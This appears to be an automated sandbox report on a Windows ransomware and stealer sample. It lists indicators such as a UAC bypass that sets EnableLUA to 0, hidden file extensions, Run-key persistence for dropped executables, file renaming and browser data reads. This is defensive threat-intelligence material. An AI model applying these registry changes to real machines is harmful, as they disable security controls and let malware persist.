Malware Analysis Report

2025-06-16 00:03

Sample ID 241106-af3tsatrbq
Target db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N
SHA256 db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9
Tags
discovery evasion persistence ransomware spyware stealer trojan
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9

Threat Level: Known bad

The file db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N was found to be: Known bad.

Malicious Activity Summary

discovery evasion persistence ransomware spyware stealer trojan

UAC bypass

Modifies visibility of file extensions in Explorer

Renames multiple (86) files with added filename extension

Renames multiple (62) files with added filename extension

Checks computer location settings

Reads user/profile data of web browsers

Executes dropped EXE

Deletes itself

Loads dropped DLL

Adds Run key to start application

Drops file in System32 directory

System Location Discovery: System Language Discovery

Unsigned PE

Enumerates physical storage devices

Suspicious use of WriteProcessMemory

Suspicious behavior: GetForegroundWindowSpam

Suspicious use of FindShellTrayWindow

Suspicious behavior: EnumeratesProcesses

Modifies registry key

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-11-06 00:10

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-11-06 00:10

Reported

2024-11-06 00:12

Platform

win7-20240903-en

Max time kernel

120s

Max time network

52s

Command Line

"C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe"

Signatures

Modifies visibility of file extensions in Explorer

evasion
Description Indicator Process Target
Set value (int) \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" C:\Windows\SysWOW64\reg.exe N/A

UAC bypass

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Windows\SysWOW64\reg.exe N/A

Renames multiple (62) files with added filename extension

ransomware

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Control Panel\International\Geo\Nation C:\Users\Admin\tIUAwkcA\WYUQIMko.exe N/A

Deletes itself

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\tIUAwkcA\WYUQIMko.exe N/A
N/A N/A C:\ProgramData\XggMMcAg\LkAAYskU.exe N/A

Reads user/profile data of web browsers

spyware stealer

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Windows\CurrentVersion\Run\WYUQIMko.exe = "C:\\Users\\Admin\\tIUAwkcA\\WYUQIMko.exe" C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\LkAAYskU.exe = "C:\\ProgramData\\XggMMcAg\\LkAAYskU.exe" C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Windows\CurrentVersion\Run\WYUQIMko.exe = "C:\\Users\\Admin\\tIUAwkcA\\WYUQIMko.exe" C:\Users\Admin\tIUAwkcA\WYUQIMko.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\LkAAYskU.exe = "C:\\ProgramData\\XggMMcAg\\LkAAYskU.exe" C:\ProgramData\XggMMcAg\LkAAYskU.exe N/A

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cscript.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cscript.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cscript.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cscript.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cscript.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\tIUAwkcA\WYUQIMko.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cscript.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cscript.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe N/A

Modifies registry key

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe N/A
